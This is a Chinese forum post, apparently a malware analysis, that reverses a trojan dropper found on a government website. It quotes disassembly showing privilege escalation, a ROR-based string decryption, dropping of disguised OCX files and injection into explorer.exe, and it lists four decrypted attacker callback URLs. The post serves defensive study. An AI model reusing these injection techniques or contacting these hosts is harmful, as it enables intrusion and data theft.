发改委网站被挂马,芳芳发现的,分析了一下
一
母体文件ldj.exe的分析:(母体文件在加载完ocx后代码开始混乱了,不知道是我的机子上还有别的木马,还是加载后的问题)
主要有几个行为:1,生成dbr99008.ocx和dbr31004.ocx
2,复制rundll.exe到C:\WINDOWS\SYSTEM32\gbvgbv31.exe,并运行,加载上述文件,并注入到explorer.exe中
3,Winston0\default方式交互
4,解密出4个收信网址
00401100 68 74 74 70 3A 2F 2F 67 http://g
00401110 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
00401120 39 36 32 2F 66 72 62 2F 72 62 2E 61 73 70 962/frb/rb.asp
00401180 68 74 74 70 3A 2F 2F 67 http://g
00401190 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
004011A0 39 36 32 2F 66 74 2E 61 73 70 962/ft.asp
00401208 68 74 74 70 3A 2F 2F 67 75 63 63 69 2E 74 6C 79 http://gucci.tly
00401218 73 6A 2E 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 sj.com:9962/Fone
00401228 39 2F 6A 75 73 74 2E 61 73 70 9/just.asp
00401288 68 74 74 70 3A 2F 2F 76 35 2E 37 31 77 61 70 2E http://v5.71wap.
00401298 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 39 2F 6A com:9962/Fone9/j
004012A8 75 73 74 2E 61 73 70 ust.asp
另外,还生成一种字体ttf文件,没发现有什么作用,应该是中间过度吧,不过一直在fonts文件夹下就没有找到这个文件!!
母体加了upx,到达oep,像一些简单的函数,就不贴代码了
00401EB9 55 push ebp
00401EBA 8BEC mov ebp, esp
00401EBC 81EC 580A0000 sub esp, 0A58
00401EC2 53 push ebx
00401EC3 56 push esi
00401EC4 57 push edi
00401EC5 6A 40 push 40
00401EC7 33DB xor ebx, ebx
00401EC9 59 pop ecx
00401ECA 33C0 xor eax, eax
00401ECC 8DBD C9FDFFFF lea edi, dword ptr [ebp-237]
00401ED2 889D C8FDFFFF mov byte ptr [ebp-238], bl
00401ED8 8B35 A8104000 mov esi, dword ptr [4010A8] ; MSVCRT.sprintf
00401EDE F3:AB rep stos dword ptr es:[edi]
00401EE0 66:AB stos word ptr es:[edi]
00401EE2 AA stos byte ptr es:[edi]
00401EE3 68 FC154000 push 004015FC ; ASCII "008"
00401EE8 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00401EEE 68 F0154000 push 004015F0 ; ASCII "dbr99%s.ocx"
00401EF3 50 push eax
00401EF4 C645 FC 54 mov byte ptr [ebp-4], 54 ; TLS
00401EF8 C645 FD 4C mov byte ptr [ebp-3], 4C
00401EFC C645 FE 53 mov byte ptr [ebp-2], 53
00401F00 885D FF mov byte ptr [ebp-1], bl
00401F03 FFD6 call esi
00401F05 83C4 0C add esp, 0C
00401F08 33C0 xor eax, eax
00401F0A 8DBD C5FCFFFF lea edi, dword ptr [ebp-33B]
00401F10 889D C4FCFFFF mov byte ptr [ebp-33C], bl
00401F16 6A 40 push 40
00401F18 889D C0FBFFFF mov byte ptr [ebp-440], bl
00401F1E 59 pop ecx
00401F1F C685 CCFEFFFF 7>mov byte ptr [ebp-134], 72
00401F26 F3:AB rep stos dword ptr es:[edi]
00401F28 66:AB stos word ptr es:[edi]
00401F2A AA stos byte ptr es:[edi]
00401F2B 6A 40 push 40
00401F2D 33C0 xor eax, eax
00401F2F 59 pop ecx
00401F30 8DBD C1FBFFFF lea edi, dword ptr [ebp-43F]
00401F36 F3:AB rep stos dword ptr es:[edi]
00401F38 66:AB stos word ptr es:[edi]
00401F3A AA stos byte ptr es:[edi]
00401F3B 6A 3D push 3D
00401F3D 33C0 xor eax, eax
00401F3F 59 pop ecx
00401F40 8DBD D9FEFFFF lea edi, dword ptr [ebp-127]
00401F46 C685 CDFEFFFF 7>mov byte ptr [ebp-133], 75 ; rundll32.exe
00401F4D C685 CEFEFFFF 6>mov byte ptr [ebp-132], 6E
00401F54 C685 CFFEFFFF 6>mov byte ptr [ebp-131], 64
00401F5B C685 D0FEFFFF 6>mov byte ptr [ebp-130], 6C
00401F62 C685 D1FEFFFF 6>mov byte ptr [ebp-12F], 6C
00401F69 C685 D2FEFFFF 3>mov byte ptr [ebp-12E], 33
00401F70 C685 D3FEFFFF 3>mov byte ptr [ebp-12D], 32
00401F77 C685 D4FEFFFF 2>mov byte ptr [ebp-12C], 2E
00401F7E C685 D5FEFFFF 6>mov byte ptr [ebp-12B], 65
00401F85 C685 D6FEFFFF 7>mov byte ptr [ebp-12A], 78
00401F8C C685 D7FEFFFF 6>mov byte ptr [ebp-129], 65
00401F93 889D D8FEFFFF mov byte ptr [ebp-128], bl
00401F99 F3:AB rep stos dword ptr es:[edi]
00401F9B 66:AB stos word ptr es:[edi]
00401F9D AA stos byte ptr es:[edi]
00401F9E 6A 40 push 40
00401FA0 33C0 xor eax, eax
00401FA2 59 pop ecx
00401FA3 8DBD B9F9FFFF lea edi, dword ptr [ebp-647]
00401FA9 889D B8F9FFFF mov byte ptr [ebp-648], bl
00401FAF F3:AB rep stos dword ptr es:[edi]
00401FB1 66:AB stos word ptr es:[edi]
00401FB3 AA stos byte ptr es:[edi]
00401FB4 E8 02F9FFFF call 004018BB ; 提权
00401FB9 BF 04010000 mov edi, 104
00401FBE 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00401FC4 57 push edi
00401FC5 50 push eax
00401FC6 53 push ebx
00401FC7 FF15 50104000 call dword ptr [401050] ; kernel32.GetModuleFileNameA
00401FCD 8D45 D0 lea eax, dword ptr [ebp-30]
00401FD0 68 E4154000 push 004015E4 ; 得到生成dbr31004.ocx的路径
00401FD5 50 push eax
00401FD6 FFD6 call esi
00401FD8 8D45 D0 lea eax, dword ptr [ebp-30]
00401FDB 50 push eax
00401FDC 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FE2 50 push eax
00401FE3 E8 A8020000 call 00402290 ; jmp 到 MSVCRT.strcpy
00401FE8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FEE 68 DC154000 push 004015DC ; ASCII ".ocx"
00401FF3 50 push eax
00401FF4 E8 91020000 call 0040228A ; jmp 到 MSVCRT.strcat
00401FF9 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FFF 50 push eax
00402000 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00402006 50 push eax
00402007 E8 BEFAFFFF call 00401ACA ; 得到C:\WINDOWS\SYSTEM32\dbr31004.ocx路径
0040200C 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00402012 50 push eax
00402013 E8 8AFBFFFF call 00401BA2 ; 打开文件,读入数据,并解密出网址,这里读入的就是加密的网址,里面实现解密
这里我们来看看是解密函数:这个比较简单,获取字符串"LUDJ"的长度,以此为循环的小条件,读取118h大小的数据,简单的ror操作
00401B3C 55 push ebp
00401B3D 8BEC mov ebp, esp
00401B3F 53 push ebx
00401B40 56 push esi
00401B41 57 push edi
00401B42 8B75 08 mov esi, dword ptr [ebp+8]
00401B45 8B7D 10 mov edi, dword ptr [ebp+10]
00401B48 8B5D 0C mov ebx, dword ptr [ebp+C]
00401B4B 8B55 14 mov edx, dword ptr [ebp+14]
00401B4E 85DB test ebx, ebx
00401B50 74 18 je short 00401B6A
00401B52 8A06 mov al, byte ptr [esi]
00401B54 8A0F mov cl, byte ptr [edi]
00401B56 D2C8 ror al, cl
00401B58 8806 mov byte ptr [esi], al
00401B5A 46 inc esi
00401B5B 47 inc edi
00401B5C 4B dec ebx
00401B5D 4A dec edx
00401B5E 85D2 test edx, edx
00401B60 ^ 75 EC jnz short 00401B4E
00401B62 8B55 14 mov edx, dword ptr [ebp+14]
00401B65 8B7D 10 mov edi, dword ptr [ebp+10]
00401B68 ^ EB E4 jmp short 00401B4E
00401B6A 5F pop edi
00401B6B 5E pop esi
00401B6C 5B pop ebx
00401B6D 5D pop ebp
00401B6E C3 retn
00402018 83C4 24 add esp, 24
0040201B 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402021 C645 F4 5C mov byte ptr [ebp-C], 5C ;得到fonts\dbr31004.ttf路径
00402025 C645 F5 66 mov byte ptr [ebp-B], 66
00402029 57 push edi
0040202A 50 push eax
0040202B C645 F6 6F mov byte ptr [ebp-A], 6F
0040202F C645 F7 6E mov byte ptr [ebp-9], 6E
00402033 C645 F8 74 mov byte ptr [ebp-8], 74
00402037 C645 F9 73 mov byte ptr [ebp-7], 73
0040203B C645 FA 5C mov byte ptr [ebp-6], 5C
0040203F 885D FB mov byte ptr [ebp-5], bl
00402042 FF15 4C104000 call dword ptr [40104C] ; kernel32.GetWindowsDirectoryA
00402048 8D45 F4 lea eax, dword ptr [ebp-C]
0040204B 50 push eax
0040204C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402052 50 push eax
00402053 E8 32020000 call 0040228A ; jmp 到 MSVCRT.strcat
00402058 8D45 D0 lea eax, dword ptr [ebp-30]
0040205B 50 push eax
0040205C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402062 50 push eax
00402063 E8 22020000 call 0040228A ; jmp 到 MSVCRT.strcat
00402068 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040206E 68 D4154000 push 004015D4 ; ASCII ".ttf"
00402073 50 push eax
00402074 E8 11020000 call 0040228A ; jmp 到 MSVCRT.strcat
00402079 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040207F 50 push eax
00402080 E8 06FEFFFF call 00401E8B ;create文件,但是在相应目录下并没有找到文件
00402085 8B3D 70104000 mov edi, dword ptr [401070] ; kernel32.GetTickCount,获得系统启动到现在的总时间,要随机生成文件了
0040208B 83C4 1C add esp, 1C
0040208E FFD7 call edi
00402090 50 push eax
00402091 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
00402097 68 C4154000 push 004015C4 ; ASCII "%08Xmdd.temp"
0040209C 50 push eax
0040209D FFD6 call esi
0040209F 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020A5 50 push eax
004020A6 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020AC 50 push eax
004020AD E8 DAF9FFFF call 00401A8C ;这些temp文件的路径为tmp路径
004020B2 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020B8 50 push eax
004020B9 8D45 FC lea eax, dword ptr [ebp-4]
004020BC 6A 66 push 66
004020BE 50 push eax ;TLS
004020BF 53 push ebx
004020C0 E8 61F8FFFF call 00401926 ;通过findresource的方式释放文件,大小9E00,并得到PE头的地址为00404090
这个函数的作用是生成dbr31004.ocx文件,首先通过上面刚刚得到的临时文件,向其中写入9E00的数据,地址为00404090
004020C5 83C4 24 add esp, 24
004020C8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
004020CE 6A 03 push 3
004020D0 50 push eax
004020D1 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020D7 50 push eax
004020D8 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA,将刚刚生成的temp移动到system32文件夹下,并删除掉temp文件
004020DE 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020E4 50 push eax
004020E5 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
004020EB FFD7 call edi
004020ED 50 push eax
004020EE 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
004020F4 68 B4154000 push 004015B4 ; ASCII "%08Xeime.temp" 这个与上述相同,不再赘述,这是在system32生成dbr99008.ocx,tmp
文件夹生成的temp都删除掉
004020F9 50 push eax
004020FA FFD6 call esi
004020FC 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402102 50 push eax
00402103 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402109 50 push eax
0040210A E8 7DF9FFFF call 00401A8C
0040210F 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402115 50 push eax
00402116 8D45 FC lea eax, dword ptr [ebp-4]
00402119 6A 67 push 67
0040211B 50 push eax
0040211C 53 push ebx
0040211D E8 04F8FFFF call 00401926
00402122 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402128 50 push eax
00402129 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040212F 50 push eax
00402130 E8 95F9FFFF call 00401ACA ;得到system32的路径,不再详细描述
00402135 83C4 2C add esp, 2C
00402138 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040213E 6A 03 push 3
00402140 50 push eax
00402141 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402147 50 push eax
00402148 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA
0040214E 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402154 50 push eax
00402155 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
0040215B 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402161 50 push eax
00402162 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402168 50 push eax
00402169 E8 5CF9FFFF call 00401ACA
0040216E 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402174 50 push eax
00402175 68 A4154000 push 004015A4 ; ASCII "gbvgbv31.exe"
0040217A E8 4BF9FFFF call 00401ACA ;这个gbvgbv.exe其实就是rundll32.exe,在system32文件夹下拷贝生成
0040217F 83C4 10 add esp, 10
00402182 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402188 53 push ebx
00402189 50 push eax
0040218A 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402190 50 push eax
00402191 FF15 6C104000 call dword ptr [40106C] ; kernel32.CopyFileA
00402197 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040219D C645 E4 65 mov byte ptr [ebp-1C], 65 ;explorer.exe
004021A1 50 push eax
004021A2 8D45 E4 lea eax, dword ptr [ebp-1C]
004021A5 50 push eax
004021A6 C645 E5 78 mov byte ptr [ebp-1B], 78
004021AA C645 E6 70 mov byte ptr [ebp-1A], 70
004021AE C645 E7 6C mov byte ptr [ebp-19], 6C
004021B2 C645 E8 6F mov byte ptr [ebp-18], 6F
004021B6 C645 E9 72 mov byte ptr [ebp-17], 72
004021BA C645 EA 65 mov byte ptr [ebp-16], 65
004021BE C645 EB 72 mov byte ptr [ebp-15], 72
004021C2 C645 EC 2E mov byte ptr [ebp-14], 2E
004021C6 C645 ED 65 mov byte ptr [ebp-13], 65
004021CA C645 EE 78 mov byte ptr [ebp-12], 78
004021CE C645 EF 65 mov byte ptr [ebp-11], 65
004021D2 885D F0 mov byte ptr [ebp-10], bl
004021D5 E8 1BF5FFFF call 004016F5 ;这个函数创建进程快照,得到那三个函数的地址,查找进程explorer.exe,这里是要注入线程了
我们来看看找到进程后干了些什么吧,这是函数一:
00401600 55 push ebp
00401601 8BEC mov ebp, esp
00401603 81EC 08020000 sub esp, 208
00401609 53 push ebx
0040160A 56 push esi
0040160B 57 push edi
0040160C 6A 40 push 40
0040160E 33DB xor ebx, ebx
00401610 59 pop ecx
00401611 33C0 xor eax, eax
00401613 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
00401619 889D F8FDFFFF mov byte ptr [ebp-208], bl
0040161F 6A 40 push 40
00401621 F3:AB rep stos dword ptr es:[edi]
00401623 66:AB stos word ptr es:[edi]
00401625 AA stos byte ptr es:[edi]
00401626 59 pop ecx
00401627 33C0 xor eax, eax
00401629 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
0040162F 889D FCFEFFFF mov byte ptr [ebp-104], bl
00401635 F3:AB rep stos dword ptr es:[edi]
00401637 66:AB stos word ptr es:[edi]
00401639 AA stos byte ptr es:[edi]
0040163A E8 7C020000 call 004018BB ;上面提到过这个函数了,提权
0040163F FF75 08 push dword ptr [ebp+8]
00401642 53 push ebx
00401643 68 10040000 push 410
00401648 FF15 84104000 call dword ptr [401084] ; kernel32.OpenProcess,打开explorer.exe的进程
0040164E 8BF8 mov edi, eax
00401650 3BFB cmp edi, ebx
00401652 0F84 8F000000 je 004016E7
00401658 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040165E 68 04010000 push 104
00401663 50 push eax
00401664 53 push ebx
00401665 57 push edi
00401666 E8 850C0000 call 004022F0 ; jmp 到 PSAPI.GetModuleFileNameExA,获得文件路径名C:\WINDOWS\Explorer.EXE
0040166B 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401671 50 push eax
00401672 E8 1F0C0000 call 00402296 ; jmp 到 MSVCRT.strlen
00401677 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040167D 50 push eax
0040167E 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401684 50 push eax
00401685 E8 060C0000 call 00402290 ; jmp 到 MSVCRT.strcpy
0040168A 8B35 94104000 mov esi, dword ptr [401094] ; MSVCRT.strrchr
00401690 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401696 6A 5C push 5C
00401698 50 push eax
00401699 FFD6 call esi ;explorer.exe首次出现的位置0012F2CA
0040169B 83C4 14 add esp, 14
0040169E 3BC3 cmp eax, ebx
004016A0 74 39 je short 004016DB
004016A2 8818 mov byte ptr [eax], bl
004016A4 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016AA 6A 5C push 5C
004016AC 50 push eax
004016AD FFD6 call esi
004016AF 59 pop ecx
004016B0 3BC3 cmp eax, ebx
004016B2 59 pop ecx
004016B3 74 26 je short 004016DB
004016B5 8818 mov byte ptr [eax], bl
004016B7 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016BD 68 38154000 push 00401538 ; ASCII "\data\elements.data"
004016C2 50 push eax
004016C3 E8 C20B0000 call 0040228A ; jmp 到 MSVCRT.strcat得到路劲C:\data\elements.data
004016C8 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016CE 50 push eax
004016CF E8 D5020000 call 004019A9 ;findfirstfile,并没有找到该文件
004016D4 83C4 0C add esp, 0C
004016D7 85C0 test eax, eax
004016D9 74 13 je short 004016EE
004016DB 57 push edi
004016DC FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016E2 6A 01 push 1
004016E4 58 pop eax
004016E5 EB 09 jmp short 004016F0
004016E7 53 push ebx
004016E8 FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016EE 33C0 xor eax, eax
004016F0 5F pop edi
004016F1 5E pop esi
004016F2 5B pop ebx
004016F3 C9 leave
004016F4 C3 retn
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
